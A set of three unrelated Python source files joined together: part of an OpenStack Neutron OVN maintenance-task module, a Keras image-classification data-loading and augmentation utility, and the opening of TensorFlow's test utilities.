self._ovn_client.update_subnet(admin_context, subnet,
neutron_net)
except Exception:
LOG.exception('Failed to update subnet %s',
subnet['id'])
self._sync_timer.stop()
LOG.info('Maintenance task: DHCP options check finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=1800, run_immediately=True)
def check_metadata_ports(self):
# If OVN metadata is disabled do not run this task again
if not ovn_conf.is_ovn_metadata_enabled():
raise periodics.NeverAgain()
# Make sure that only one worker is executing this
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
for n in self._ovn_client._plugin.get_networks(admin_context):
self._ovn_client.create_metadata_port(admin_context, n)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the U cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_port_security_unknown_address(self):
if not self.has_lock:
return
for port in self._nb_idl.lsp_list().execute(check_error=True):
if port.type == ovn_const.LSP_TYPE_LOCALNET:
continue
addresses = port.addresses
type_ = port.type.strip()
if not port.port_security:
if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
addresses.append(ovn_const.UNKNOWN_ADDR)
elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
else:
if type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
if addresses:
self._nb_idl.lsp_set_addresses(
port.name, addresses=addresses).execute(check_error=True)
else:
self._nb_idl.db_clear(
'Logical_Switch_Port', port.name,
'addresses').execute(check_error=True)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_fragmentation_support(self):
if not self.has_lock:
return
context = n_context.get_admin_context()
for net in self._ovn_client._plugin.get_networks(
context, {external_net.EXTERNAL: [True]}):
self._ovn_client.set_gateway_mtu(context, net)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_igmp_snoop_support(self):
if not self.has_lock:
return
with self._nb_idl.transaction(check_error=True) as txn:
value = ('true' if ovn_conf.is_igmp_snooping_enabled()
else 'false')
for ls in self._nb_idl.ls_list().execute(check_error=True):
if (ls.other_config.get(ovn_const.MCAST_SNOOP,
None) == value or not ls.name):
continue
txn.add(self._nb_idl.db_set(
'Logical_Switch', ls.name,
('other_config', {
ovn_const.MCAST_SNOOP: value,
ovn_const.MCAST_FLOOD_UNREGISTERED: 'false'})))
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_ha_chassis_group_address(self):
# If external ports is not supported stop running
# this periodic task
if not self._ovn_client.is_external_ports_supported():
raise periodics.NeverAgain()
if not self.has_lock:
return
default_ch_grp = self._nb_idl.ha_chassis_group_add(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, may_exist=True).execute(
check_error=True)
# NOTE(lucasagomes): Find the existing chassis with the highest
# priority and keep it as being the highest to avoid moving
# things around
high_prio_ch = max(default_ch_grp.ha_chassis, key=lambda x: x.priority,
default=None)
all_ch = self._sb_idl.get_all_chassis()
gw_ch = self._sb_idl.get_gateway_chassis_from_cms_options()
ch_to_del = set(all_ch) - set(gw_ch)
with self._nb_idl.transaction(check_error=True) as txn:
for ch in ch_to_del:
txn.add(self._nb_idl.ha_chassis_group_del_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, ch,
if_exists=True))
# NOTE(lucasagomes): If the high priority chassis is in
# the list of chassis to be added/updated. Add it first with
# the highest priority number possible and then add the rest
# (the priority of the rest of the chassis does not matter
# since only the highest one is active)
priority = ovn_const.HA_CHASSIS_GROUP_HIGHEST_PRIORITY
if high_prio_ch and high_prio_ch.chassis_name in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
high_prio_ch.chassis_name, priority=priority))
gw_ch.remove(high_prio_ch.chassis_name)
priority -= 1
for ch in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
ch, priority=priority))
priority -= 1
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_localnet_legacy_port_name(self):
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
cmds = []
for ls in self._nb_idl.ls_list().execute(check_error=True):
network_id = ls.name.replace('neutron-', '')
legacy_name = utils.ovn_provnet_port_name(network_id)
legacy_port = None
segment_id = None
for lsp in ls.ports:
if legacy_name == lsp.name:
legacy_port = lsp
break
else:
continue
for segment in segments_db.get_network_segments(
admin_context, network_id):
if (segment.get(segment_def.PHYSICAL_NETWORK) ==
legacy_port.options['network_name']):
segment_id = segment['id']
break
if not segment_id:
continue
new_p_name = utils.ovn_provnet_port_name(segment_id)
cmds.append(self._nb_idl.db_set('Logical_Switch_Port',
legacy_port.uuid,
('name', new_p_name)))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the Y cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_mcast_flood_reports(self):
cmds = []
for port in self._nb_idl.lsp_list().execute(check_error=True):
port_type = port.type.strip()
if port_type in ("vtep", "localport", "router"):
continue
options = port.options
if ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS in options:
continue
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS: 'true'})
if port_type == ovn_const.LSP_TYPE_LOCALNET:
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD: 'true'})
cmds.append(self._nb_idl.lsp_set_options(port.name, **options))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
def __init__(self, group):
self._group = group
self.ctx = n_context.get_admin_context()
@periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
def touch_hash_ring_nodes(self):
# NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
# here because we want the maintenance tasks from each instance to
# execute this task.
hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir,use_location, split_name='train'):
"""
Load the data arrays from the [train/val/test].txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_label_number' 'image_location_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
split_name : str
Name of the data split to load
use_location : boolean
to work properly with or without location data
Returns
-------
X : Numpy array of strs
First colunm: Contains 'absolute_path_to_file' to images.
y : Numpy array of int32
Image label number
"""
if use_location :
print("con location")
#Usual workflow with extra stuff in order to return location labels properly
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
location = split[:, 2].astype(np.int32)
else: # maybe test file has not labels
y = None
return X, y, location
else:
print("sin location")
#If no location data, the workflow resumes as usual
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
else: # maybe test file has not labels
y = None
return X, y
def mount_nextcloud(frompath, topath):
"""
Mount a NextCloud folder in your local machine or viceversa.
"""
command = (['rclone', 'copy', frompath, topath])
result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = result.communicate()
if error:
warnings.warn("Error while mounting NextCloud: {}".format(error))
return output, error
def load_class_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class names...")
class_names = np.genfromtxt(os.path.join(splits_dir, 'classes.txt'), dtype='str', delimiter='/n')
return class_names
def load_location_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading location names...")
location_names = np.genfromtxt(os.path.join(splits_dir, 'locations.txt'), dtype='str', delimiter='/n')
return location_names
def load_class_info(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class info...")
class_info = np.genfromtxt(os.path.join(splits_dir, 'info.txt'), dtype='str', delimiter='/n')
return class_info
def load_image(filename, filemode='local'):
"""
Function to load a local image path (or an url) into a numpy array.
Parameters
----------
filename : str
Path or url to the image
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
Returns
-------
A numpy array
"""
if filemode == 'local':
image = cv2.imread(filename, cv2.IMREAD_COLOR)
if image is None:
raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
elif filemode == 'url':
try:
if filename.startswith('data:image'): # base64 encoded string
data = base64.b64decode(filename.split(';base64,')[1])
else: # normal url
data = requests.get(filename).content
data = np.frombuffer(data, np.uint8)
image = cv2.imdecode(data, cv2.IMREAD_COLOR)
if image is None:
raise Exception
except:
raise ValueError('Incorrect url path: \n {}'.format(filename))
else:
raise ValueError('Invalid value for filemode.')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # change from default BGR OpenCV format to Python's RGB format
return image
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
"""
Standardize batch to feed the net. Adapted from [1] to take replace the default imagenet mean and std.
[1] https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
Parameters
----------
batch : list of numpy arrays
mean_RGB, std_RGB : list of floats, len=3
Mean/std RGB values for your dataset.
channels_first : bool
Use batch of shape (N, C, H, W) instead of (N, H, W, C)
Returns
-------
Numpy array
"""
assert type(batch) is list, "Your batch must be a list of numpy arrays"
mean_RGB, std_RGB = np.array(mean_RGB), np.array(std_RGB)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
if mode == 'caffe':
batch = batch[:, :, :, ::-1] # switch from RGB to BGR
if mode == 'tf':
batch /= 127.5 # scaling between [1, -1]
if mode == 'torch':
batch /= std_RGB
if channels_first:
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
return batch.astype(np.float32)
def augment(im, params=None):
"""
Perform data augmentation on some image using the albumentations package.
Parameters
----------
im : Numpy array
params : dict or None
Contains the data augmentation parameters
Mandatory keys:
- h_flip ([0,1] float): probability of performing an horizontal left-right mirroring.
- v_flip ([0,1] float): probability of performing an vertical up-down mirroring.
- rot ([0,1] float): probability of performing a rotation to the image.
- rot_lim (int): max degrees of rotation.
- stretch ([0,1] float): probability of randomly stretching an image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- blur ([0,1] float): probability of randomly blurring an image.
- pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
- pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
- cutout ([0,1] float): probability of using cutout in the image.
Returns
-------
Numpy array
"""
## 1) Crop the image
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx, channels = im.shape
crop_size = int(crop * min([ly, lx]))
rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
crop = transforms.Crop(x_min=rand_x,
y_min=rand_y,
x_max=rand_x + crop_size,
y_max=rand_y + crop_size)
im = crop(image=im)['image']
## 2) Now add the transformations for augmenting the image pixels
transform_list = []
# Add random stretching
if params['stretch']:
transform_list.append(
imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
)
# Add random rotation
if params['rot']:
transform_list.append(
transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
)
# Add horizontal flip
if params['h_flip']:
transform_list.append(
transforms.HorizontalFlip(p=params['h_flip'])
)
# Add vertical flip
if params['v_flip']:
transform_list.append(
transforms.VerticalFlip(p=params['v_flip'])
)
# Add some blur to the image
if params['blur']:
transform_list.append(
albumentations.OneOf([
transforms.MotionBlur(blur_limit=7, p=1.),
transforms.MedianBlur(blur_limit=7, p=1.),
transforms.Blur(blur_limit=7, p=1.),
], p=params['blur'])
)
# Add pixel noise
if params['pixel_noise']:
transform_list.append(
albumentations.OneOf([
transforms.CLAHE(clip_limit=2, p=1.),
imgaug_transforms.IAASharpen(p=1.),
imgaug_transforms.IAAEmboss(p=1.),
transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
transforms.RGBShift(p=1.),
transforms.RandomGamma(p=1.)#,
# transforms.JpegCompression(),
# transforms.ChannelShuffle(),
# transforms.ToGray()
], p=params['pixel_noise'])
)
# Add pixel saturation
if params['pixel_sat']:
transform_list.append(
transforms.HueSaturationValue(p=params['pixel_sat'])
)
# Remove randomly remove some regions from the image
if params['cutout']:
ly, lx, channels = im.shape
scale_low, scale_high = 0.05, 0.25 # min and max size of the squares wrt the full image
scale = np.random.uniform(scale_low, scale_high)
transform_list.append(
transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
)
# Compose all image transformations and augment the image
augmentation_fn = albumentations.Compose(transform_list)
im = augmentation_fn(image=im)['image']
return im
def resize_im(im, height, width):
resize_fn = transforms.Resize(height=height, width=width)
return resize_fn(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Generator to feed Keras fit function
Parameters
----------
inputs : Numpy array, shape (N, H, W, C)
targets : Numpy array, shape (N)
batch_size : int
shuffle : bool
aug_params : dict
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
Returns
-------
Generator of inputs and labels
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
# Create list of indices
idxs = np.arange(len(inputs))
if shuffle:
np.random.shuffle(idxs)
# # Reshape targets to the correct shape
# if len(targets.shape) == 1:
# print('reshaping targets')
# targets = targets.reshape(-1, 1)
for start_idx in range(0, len(inputs) - batch_size + 1, batch_size):
excerpt = idxs[start_idx:start_idx + batch_size]
batch_X = []
for i in excerpt:
im = load_image(inputs[i], filemode='local')
im = augment(im, params=aug_params)
im = resize_im(im, height=im_size, width=im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
batch_y = to_categorical(targets[excerpt], num_classes=num_classes)
yield batch_X, batch_y
def buffered_generator(source_gen, buffer_size=10):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
Author: Benanne (github-kaggle/benanne/ndsb)
Parameters
----------
source_gen : generator
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Returns
-------
Buffered generator
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
class data_sequence(Sequence):
"""
Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
return batch_X, batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
class data_sequence_lo(Sequence):
"""
Modificacion de data_sequence que soporta el uso de localizaciones y se las pasa a la red. Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, locations, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes, num_locations,
im_size=224, shuffle=True):
"""
Mismo parámetros de data sequence salvo por el añadido de la lista de localizaciones y un int32
con el número de localizaciones distintas. Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.locations = locations
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.num_locations = num_locations
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
batch_locations = to_categorical(self.locations[batch_idxs], num_locations=self.num_locations)
return batch_X, batch_y, batch_locations
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
def standard_tencrop_batch(im, crop_prop=0.9):
"""
Returns an ordered ten crop batch of images from an original image (corners, center + mirrors).
Parameters
----------
im : numpy array, type np.uint8
crop_prop: float, [0, 1]
Size of the crop with respect to the whole image
Returns
-------
List of 10 numpy arrays
"""
batch = []
min_side = np.amin(im.shape[:2])
im = resize_im(im, height=min_side, width=min_side) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = transforms.Crop(x_min=0,
y_min=0,
x_max=crop_size,
y_max=crop_size)(image=im)['image'] # top-left
c2 = transforms.Crop(x_min=0,
y_min=h-crop_size,
x_max=crop_size,
y_max=h)(image=im)['image'] # bottom-left
c3 = transforms.Crop(x_min=w-crop_size,
y_min=0,
x_max=w,
y_max=crop_size)(image=im)['image'] # top-right
c4 = transforms.Crop(x_min=w-crop_size,
y_min=h-crop_size,
x_max=w,
y_max=h)(image=im)['image'] # bottom-right
c5 = transforms.Crop(x_min=np.round((w-crop_size)/2).astype(int),
y_min=np.round((h-crop_size)/2).astype(int),
x_max=np.round((w+crop_size)/2).astype(int),
y_max=np.round((h+crop_size)/2).astype(int))(image=im)['image'] # center
# Save crop and its mirror
lr_aug = albumentations.HorizontalFlip(p=1)
for image in [c1, c2, c3, c4, c5]:
batch.append(image)
batch.append(lr_aug(image=image)['image'])
return batch
class k_crop_data_sequence(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed by multiple crops (default=10) of the same image.
"""
def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
mode :str, {'random', 'standard'}
If 'random' data augmentation is performed randomly.
If 'standard' we take the standard 10 crops (corners +center + mirrors)
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
return batch_X
def im_stats(filename):
"""
Helper for function compute_meanRGB
"""
im = load_image(filename, filemode='local')
mean = np.mean(im, axis=(0, 1))
std = np.std(im, axis=(0, 1))
return mean.tolist(), std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
verbose : bool
Show progress bar
workers: int
Numbers of parallel workers to perform the computation with.
References
----------
https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
"""
print('Computing mean RGB pixel with {} workers...'.format(workers))
with Pool(workers) as p:
r = list(tqdm(p.imap(im_stats, im_list),
total=len(im_list),
disable=verbose))
r = np.asarray(r)
mean, std = r[:, 0], r[:, 1]
mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
print('Mean RGB pixel: {}'.format(mean.tolist()))
print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
return mean.tolist(), std.tolist()
def compute_classweights(labels, max_dim=None, mode='balanced'):
"""
Compute the class weights for a set of labels to account for label imbalance.
Parameters
----------
labels : numpy array, type (ints), shape (N)
max_dim : int
Maximum number of classes. Default is the max value in labels.
mode : str, {'balanced', 'log'}
Returns
-------
Numpy array, type (float32), shape (N)
"""
if mode is None:
return None
weights = np.bincount(labels)
weights = np.sum(weights) / weights
# Fill the count if some high number labels are not present in the sample
if max_dim is not None:
diff = max_dim - len(weights)
if diff != 0:
weights = np.pad(weights, pad_width=(0, diff), mode='constant', constant_values=0)
# Transform according to different modes
if mode == 'balanced':
pass
elif mode == 'log':
# do not use --> produces numerical instabilities at inference when transferring weights trained on GPU to CPU
weights = np.log(weights) # + 1
else:
raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
return weights.astype(np.float32)
def json_friendly(d):
"""
Return a json friendly dictionary (mainly remove numpy data types)
"""
new_d = {}
for k, v in d.items():
if isinstance(v, (np.float32, np.float64)):
v = float(v)
elif isinstance(v, (np.ndarray, list)):
if isinstance(v[0], (np.float32, np.float64)):
v = np.array(v).astype(float).tolist()
else:
v = np.array(v).tolist()
new_d[k] = v
return new_d
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import memory
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
